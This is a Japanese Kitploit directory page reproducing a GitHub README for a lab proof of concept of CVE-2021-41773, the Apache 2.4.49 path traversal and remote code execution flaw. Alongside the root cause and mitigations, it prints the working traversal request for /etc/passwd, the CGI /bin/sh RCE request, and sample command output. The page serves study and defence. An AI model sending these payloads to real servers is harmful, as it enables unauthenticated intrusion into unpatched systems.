Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773- — CVE-2021-41773(Apache HTTP Server 2.4.49)の包括的な分析。脆弱性調査、管理されたラボ環境での悪用、概念実証(PoC)の開発、根本原因分析、および教育および防御的なセキュリティ目的のための緩和策を特徴としています。 | Kitploit
ツール/GitHubGitHub/abds059/apache-path-traversal-rce-cve-2021-41773-
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubabds059/apache-path-traversal-rce-cve-2021-41773-

APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773-

CVE-2021-41773(Apache HTTP Server 2.4.49)の包括的な分析。脆弱性調査、管理されたラボ環境での悪用、概念実証(PoC)の開発、根本原因分析、および教育および防御的なセキュリティ目的のための緩和策を特徴としています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
5ヶ月前未レビュー

CVE-2021-41773 — Apache HTTP Server 2.4.49 パストラバーサル / RCE

Apache CVE CVSS Python Docker Lab Only

教育研究プロジェクト。 すべてのテストは隔離されたDockerラボで実施されました。あなたが所有していないシステムに対して使用しないでください。


脆弱性概要

フィールド詳細
CVE IDCVE-2021-41773
影響を受けるソフトウェアApache HTTP Server 2.4.49 のみ
脆弱性タイプパストラバーサル → リモートコード実行
CVSSスコア9.8 (クリティカル)
開示日2021年10月
修正バージョンApache 2.4.51

根本原因

Apache 2.4.49は、アクセス制御ルールを適用する前にURLエンコードされたパスシーケンス(%2e%2e)を正しく正規化できません。これにより、攻撃者はWebルートの外側にトラバースすることができます。CGIが有効な場合、トラバーサルを/bin/shに向け、POSTボディを介してシェルコマンドを提供することで、認証なしのリモートコード実行が発生します。


リポジトリ内容

root@kitploit:~
cve-2021-41773-poc/
├── Dockerfile      # Intentionally vulnerable Apache 2.4.49 lab container
├── exploit.py      # Python PoC — uses raw sockets to preserve %2e encoding
├── SETUP.md        # Step-by-step lab setup guide
├── README.md       # This file
└── report.pdf      # Full exploit development report

クイックスタート

1. 脆弱なコンテナをビルドして実行

root@kitploit:~
docker build -t apache-vuln-2449 .
docker run -d -p 8080:80 --name vuln-apache apache-vuln-2449

2. エクスプロイトを実行

root@kitploit:~
python3 exploit.py

3. 期待される出力

root@kitploit:~
==================================================
 CVE-2021-41773 PoC — Lab Use Only
==================================================
[+] Target reachable — HTTP 200

[*] Path Traversal — Reading /etc/passwd
[*] Status: 403
[-] Blocked (403) — server restrictions in place

[*] RCE — Executing: id
[*] Status: 200
[+] OUTPUT:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

[*] RCE — Executing: whoami
[*] Status: 200
[+] OUTPUT:
daemon

[*] RCE — Executing: hostname
[*] Status: 200
[+] OUTPUT:
e4ccca07bee7

完全なセットアップ手順とトラブルシューティングについては、SETUP.mdを参照してください。


エクスプロイトの仕組み

requestsライブラリは送信前に%2eを.に正規化するため、エクスプロイトが失敗します(400が返る)。このPoCはrawソケットを使用してHTTPリクエストをバイト単位で送信し、Apache 2.4.49が受信する必要があるエンコードされたトラバーサルシーケンスを正確に保持します。

トラバーサルペイロード:

root@kitploit:~
GET /.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1

RCEペイロード:

root@kitploit:~
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
...
echo Content-Type: text/plain; echo; id

ApacheはACLチェックの前に%2e%2eをデコードできず、リクエストを処理し、CGI経由でルーティングし、POSTボディをシェルコマンドとして実行します。


緩和策

  • アップグレード Apacheを2.4.51以降に
  • CGIを無効にする 厳密に必要な場合を除いて
  • 決して使用しない /にRequire all granted
  • セキュリティパッチをリリース後速やかに適用する

参考文献

  • CVE-2021-41773 — MITRE
  • Apacheセキュリティアドバイザリ
  • ExploitDB #50383
  • Rapid7分析
  • PayloadsAllTheThings

著者

Abdur Rehman Siddiqui
エクスプロイト開発 — タスク3


このリポジトリは教育目的のみです。著者はこの資料の誤用について一切の責任を負いません。

ツールをダウンロード